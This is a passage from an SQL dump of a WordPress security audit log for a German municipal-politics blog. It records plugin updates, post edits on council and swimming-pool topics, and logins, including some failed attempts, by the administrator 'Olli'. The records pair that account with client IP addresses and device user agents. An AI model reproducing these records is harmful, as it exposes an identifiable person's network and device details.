WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2306,391,'ClientIP','195.128.40.90'),(2307,391,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2308,391,'CurrentUserID','2'),(2309,391,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2310,392,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2311,392,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2312,392,'ClientIP','195.128.40.90'),(2313,392,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2314,392,'CurrentUserID','2'),(2315,392,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2316,393,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2317,393,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2318,393,'ClientIP','195.128.40.90'),(2319,393,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2320,393,'CurrentUserID','2'),(2321,393,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2322,394,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2323,394,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2324,394,'ClientIP','195.128.40.90'),(2325,394,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2326,394,'CurrentUserID','2'),(2327,394,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2328,395,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2329,395,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2330,395,'ClientIP','195.128.40.90'),(2331,395,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2332,395,'CurrentUserID','2'),(2333,395,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2334,396,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2335,396,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2336,396,'ClientIP','195.128.40.90'),(2337,396,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2338,396,'CurrentUserID','2'),(2339,396,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2340,397,'PostID','403'),(2341,397,'PostType','post'),(2342,397,'PostTitle','Auto Draft'),(2343,397,'OldDate','2015-12-03 10:14:12'),(2344,397,'NewDate','2015-12-03 10:14:26'),(2345,397,'ClientIP','195.128.40.90'),(2346,397,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2347,397,'CurrentUserID','2'),(2348,397,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2349,398,'PostID','403'),(2350,398,'PostType','post'),(2351,398,'PostTitle','Freibad Mählersbeck'),(2352,398,'PostUrl','http://www.ollital.de/wordpress/?p=403'),(2353,398,'RevisionLink',''),(2354,398,'ClientIP','195.128.40.90'),(2355,398,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2356,398,'CurrentUserID','2'),(2357,398,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2358,399,'PostID','403'),(2359,399,'PostType','post'),(2360,399,'PostTitle','Freibad Mählersbeck'),(2361,399,'PostUrl','http://www.ollital.de/wordpress/?p=403'),(2362,399,'RevisionLink',''),(2363,399,'ClientIP','195.128.40.90'),(2364,399,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2365,399,'CurrentUserID','2'),(2366,399,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2367,400,'PostID','403'),(2368,400,'PostType','post'),(2369,400,'PostTitle','Freibad Mählersbeck'),(2370,400,'PostUrl','http://www.ollital.de/wordpress/?p=403'),(2371,400,'RevisionLink',''),(2372,400,'ClientIP','195.128.40.90'),(2373,400,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2374,400,'CurrentUserID','2'),(2375,400,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2376,401,'PostID','403'),(2377,401,'PostType','post'),(2378,401,'PostTitle','Freibad Mählersbeck'),(2379,401,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/freibad-mahlersbeck/'),(2380,401,'ClientIP','195.128.40.90'),(2381,401,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2382,401,'CurrentUserID','2'),(2383,401,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2384,402,'PostID','403'),(2385,402,'PostType','post'),(2386,402,'PostTitle','Freibad Mählersbeck'),(2387,402,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/freibad-mahlersbeck/'),(2388,402,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=404'),(2389,402,'ClientIP','195.128.40.90'),(2390,402,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2391,402,'CurrentUserID','2'),(2392,402,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2393,403,'Username','Olli'),(2394,403,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2395,403,'ClientIP','195.128.40.90'),(2396,403,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2397,404,'Attempts','4'),(2398,404,'Username','Olli'),(2399,404,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2400,404,'ClientIP','194.99.144.7'),(2401,404,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2402,405,'Username','Olli'),(2403,405,'CurrentUserRoles','a:1:{i:0;s:13:\"administrator\";}'),(2404,405,'ClientIP','194.99.144.7'),(2405,405,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143'),(2406,406,'Username','Olli'),(2407,406,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2408,406,'ClientIP','194.99.144.7'),(2409,406,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2410,407,'PostID','405'),(2411,407,'PostType','post'),(2412,407,'PostTitle','Auto Draft'),(2413,407,'OldDate','2015-12-03 16:24:50'),(2414,407,'NewDate','2015-12-03 16:25:34'),(2415,407,'ClientIP','194.99.144.7'),(2416,407,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2417,407,'CurrentUserID','2'),(2418,407,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2419,408,'PostID','405'),(2420,408,'PostType','post'),(2421,408,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2422,408,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2423,408,'RevisionLink',''),(2424,408,'ClientIP','194.99.144.7'),(2425,408,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2426,408,'CurrentUserID','2'),(2427,408,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2428,409,'PostID','405'),(2429,409,'PostType','post'),(2430,409,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2431,409,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2432,409,'RevisionLink',''),(2433,409,'ClientIP','194.99.144.7'),(2434,409,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2435,409,'CurrentUserID','2'),(2436,409,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2437,410,'PostID','405'),(2438,410,'PostType','post'),(2439,410,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2440,410,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2441,410,'RevisionLink',''),(2442,410,'ClientIP','194.99.144.7'),(2443,410,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2444,410,'CurrentUserID','2'),(2445,410,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2446,411,'PostID','405'),(2447,411,'PostType','post'),(2448,411,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2449,411,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2450,411,'ClientIP','194.99.144.7'),(2451,411,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2452,411,'CurrentUserID','2'),(2453,411,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2454,412,'PostID','405'),(2455,412,'PostType','post'),(2456,412,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2457,412,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2458,412,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=406'),(2459,412,'ClientIP','194.99.144.7'),(2460,412,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2461,412,'CurrentUserID','2'),(2462,412,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2463,413,'PostID','405'),(2464,413,'PostType','post'),(2465,413,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2466,413,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2467,413,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=406'),(2468,413,'ClientIP','194.99.144.7'),(2469,413,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2470,413,'CurrentUserID','2'),(2471,413,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2472,414,'PostID','405'),(2473,414,'PostType','post'),(2474,414,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2475,414,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2476,414,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=407'),(2477,414,'ClientIP','194.99.144.7'),(2478,414,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2479,414,'CurrentUserID','2'),(2480,414,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2481,415,'PostID','405'),(2482,415,'PostType','post'),(2483,415,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2484,415,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2485,415,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=407'),(2486,415,'ClientIP','194.99.144.7'),(2487,415,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2488,415,'CurrentUserID','2'),(2489,415,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2490,416,'PostID','405'),(2491,416,'PostType','post'),(2492,416,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2493,416,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2494,416,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=408'),(2495,416,'ClientIP','194.99.144.7'),(2496,416,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2497,416,'CurrentUserID','2'),(2498,416,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2499,417,'PostID','405'),(2500,417,'PostType','post'),(2501,417,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2502,417,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2503,417,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=408'),(2504,417,'ClientIP','194.99.144.7'),(2505,417,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2506,417,'CurrentUserID','2'),(2507,417,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2508,418,'PostID','405'),(2509,418,'PostType','post'),(2510,418,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2511,418,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2512,418,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=409'),(2513,418,'ClientIP','194.99.144.7'),(2514,418,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2515,418,'CurrentUserID','2'),(2516,418,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2517,419,'PostID','405'),(2518,419,'PostType','post'),(2519,419,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2520,419,'PostUrl','http://www.ollital.de/wordpress/?p=405'),(2521,419,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=410'),(2522,419,'ClientIP','194.99.144.7'),(2523,419,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2524,419,'CurrentUserID','2'),(2525,419,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2526,420,'PostID','405'),(2527,420,'PostType','post'),(2528,420,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2529,420,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/ausschuss-stadtentwicklung-03-12-2015/'),(2530,420,'ClientIP','176.6.87.139'),(2531,420,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2532,420,'CurrentUserID','2'),(2533,420,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2534,421,'PostID','405'),(2535,421,'PostType','post'),(2536,421,'PostTitle','Ausschuss Stadtentwicklung 03.12.2015'),(2537,421,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/12/ausschuss-stadtentwicklung-03-12-2015/'),(2538,421,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=411'),(2539,421,'ClientIP','176.6.87.139'),(2540,421,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2541,421,'CurrentUserID','2'),(2542,421,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2543,422,'Username','Olli'),(2544,422,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2545,422,'ClientIP','5.147.41.205'),(2546,422,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2547,423,'Attempts','1'),(2548,423,'Username','Olli'),(2549,423,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2550,423,'ClientIP','195.128.40.90'),(2551,423,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2552,424,'Username','Olli'),(2553,424,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2554,424,'ClientIP','195.128.40.90'),(2555,424,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2556,425,'PostID','394'),(2557,425,'PostType','post'),(2558,425,'PostTitle','Auto Draft'),(2559,425,'ClientIP','81.169.187.232'),(2560,425,'UserAgent','WordPress/4.3.1; http://www.ollital.de/wordpress'),(2561,425,'CurrentUserID','0'),(2562,426,'Username','Olli'),(2563,426,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2564,426,'ClientIP','195.128.40.90'),(2565,426,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2566,427,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2567,427,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.1\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2568,427,'ClientIP','195.128.40.90'),(2569,427,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2570,427,'CurrentUserID','2'),(2571,427,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2572,428,'PluginFile','/var/www/wordpress/wp-content/plugins/advanced-ads/advanced-ads.php'),(2573,428,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:12:\"Advanced Ads\";s:9:\"PluginURI\";s:25:\"https://wpadvancedads.com\";s:7:\"Version\";s:6:\"1.6.13\";s:6:\"Author\";s:12:\"Thomas Maier\";s:7:\"Network\";s:5:\"False\";}'),(2574,428,'ClientIP','195.128.40.90'),(2575,428,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2576,428,'CurrentUserID','2'),(2577,428,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2578,429,'PluginFile','/var/www/wordpress/wp-content/plugins/advanced-ads/advanced-ads.php'),(2579,429,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:12:\"Advanced Ads\";s:9:\"PluginURI\";s:25:\"https://wpadvancedads.com\";s:7:\"Version\";s:6:\"1.6.14\";s:6:\"Author\";s:12:\"Thomas Maier\";s:7:\"Network\";s:5:\"False\";}'),(2580,429,'ClientIP','195.128.40.90'),(2581,429,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2582,429,'CurrentUserID','2'),(2583,429,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2584,430,'Username','Olli'),(2585,430,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2586,430,'ClientIP','176.0.31.33'),(2587,430,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2588,431,'PostID','413'),(2589,431,'PostType','post'),(2590,431,'PostTitle','Auto Draft'),(2591,431,'OldDate','2015-12-09 15:43:21'),(2592,431,'NewDate','2015-12-09 15:44:11'),(2593,431,'ClientIP','176.0.31.33'),(2594,431,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2595,431,'CurrentUserID','2'),(2596,431,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2597,432,'PostID','413'),(2598,432,'PostType','post'),(2599,432,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2600,432,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2601,432,'RevisionLink',''),(2602,432,'ClientIP','176.0.31.33'),(2603,432,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2604,432,'CurrentUserID','2'),(2605,432,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2606,433,'PostID','413'),(2607,433,'PostType','post'),(2608,433,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2609,433,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2610,433,'RevisionLink',''),(2611,433,'ClientIP','176.0.31.33'),(2612,433,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2613,433,'CurrentUserID','2'),(2614,433,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2615,434,'PostID','413'),(2616,434,'PostType','post'),(2617,434,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2618,434,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2619,434,'RevisionLink',''),(2620,434,'ClientIP','176.0.31.33'),(2621,434,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2622,434,'CurrentUserID','2'),(2623,434,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2624,435,'PostID','413'),(2625,435,'PostType','post'),(2626,435,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2627,435,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2628,435,'RevisionLink',''),(2629,435,'ClientIP','176.0.31.33'),(2630,435,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2631,435,'CurrentUserID','2'),(2632,435,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2633,436,'PostID','413'),(2634,436,'PostType','post'),(2635,436,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2636,436,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2637,436,'RevisionLink',''),(2638,436,'ClientIP','176.0.31.33'),(2639,436,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2640,436,'CurrentUserID','2'),(2641,436,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2642,437,'PostID','413'),(2643,437,'PostType','post'),(2644,437,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2645,437,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2646,437,'RevisionLink',''),(2647,437,'ClientIP','176.0.31.33'),(2648,437,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2649,437,'CurrentUserID','2'),(2650,437,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2651,438,'PostID','413'),(2652,438,'PostType','post'),(2653,438,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2654,438,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2655,438,'RevisionLink',''),(2656,438,'ClientIP','176.0.31.33'),(2657,438,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2658,438,'CurrentUserID','2'),(2659,438,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2660,439,'PostID','413'),(2661,439,'PostType','post'),(2662,439,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2663,439,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2664,439,'RevisionLink',''),(2665,439,'ClientIP','176.0.31.33'),(2666,439,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13B143 Safari/601.1.46'),(2667,439,'CurrentUserID','2'),(2668,439,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2669,440,'PostID','413'),(2670,440,'PostType','post'),(2671,440,'PostTitle','Gemeinsame Sitzung Sportausschuss und BA GMW'),(2672,440,'PostUrl','http://www.ollital.de/wordpress/?p=413'),(2673,440,'RevisionLink',''),(2674,440,'ClientIP','176.0.31.33'),(2675,440,'UserAgent','Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) 